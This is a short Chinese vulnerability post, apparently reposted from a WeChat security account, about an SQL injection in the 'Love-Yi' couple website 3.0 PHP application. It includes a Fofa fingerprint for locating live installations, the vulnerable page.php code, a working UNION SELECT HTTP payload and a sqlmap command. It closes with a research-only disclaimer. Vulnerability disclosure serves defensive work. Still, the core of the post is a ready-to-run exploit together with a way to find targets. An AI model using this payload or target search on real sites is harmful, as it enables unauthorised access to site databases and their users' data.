漏洞简介
Love-Yi情侣网站3.0是一个基于php框架和爱情主题的表白网站。经个人修改和设计更加美观好看,适合哄女朋友开心。
资产详情
Fofa:"img/like.svg" && "2022"
漏洞复现
在 /page.php 中存在select查询字句,且直接传入id参数并未加过滤,导致sql注入.
include_once 'admin/connect.php';$time = gmdate("Y-m-d", time() + 8 * 3600);$sql = "select * from text where adminName = 'admin' ";$result = mysqli_query($connect, $sql);if (mysqli_num_rows($result)) {$text = mysqli_fetch_array($result);} else {header("Location:admin/login.php");die("暂无权限");}$id = $_GET['id'];$article = "SELECT * FROM article WHERE id='$id' limit 1";$resarticle = mysqli_query($connect, $article);$info = mysqli_fetch_array($resarticle);
Payload:
GET /page.php?id=' UNION ALL SELECT NULL,NULL,NULL,CONCAT(IFNULL(CAST(USER() AS CHAR),0x20)),NULL-- c HTTP/1.1Cache-Control: no-cacheReferer: http://127.0.0.1/page.php?id=Cookie: PHPSESSID=9995uqi2lo93hmm4f9vh8jifq4Host: 127.0.0.1Accept: */*Accept-Encoding: gzip, deflateConnection: close
Sqlmap语句: python sqlmap.py -u http://127.0.0.1/page.php?id=* –level=3
免责声明
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!
原文始发于微信公众号(星悦安全):Love-Yi情侣网站3.0存在SQL注入漏洞
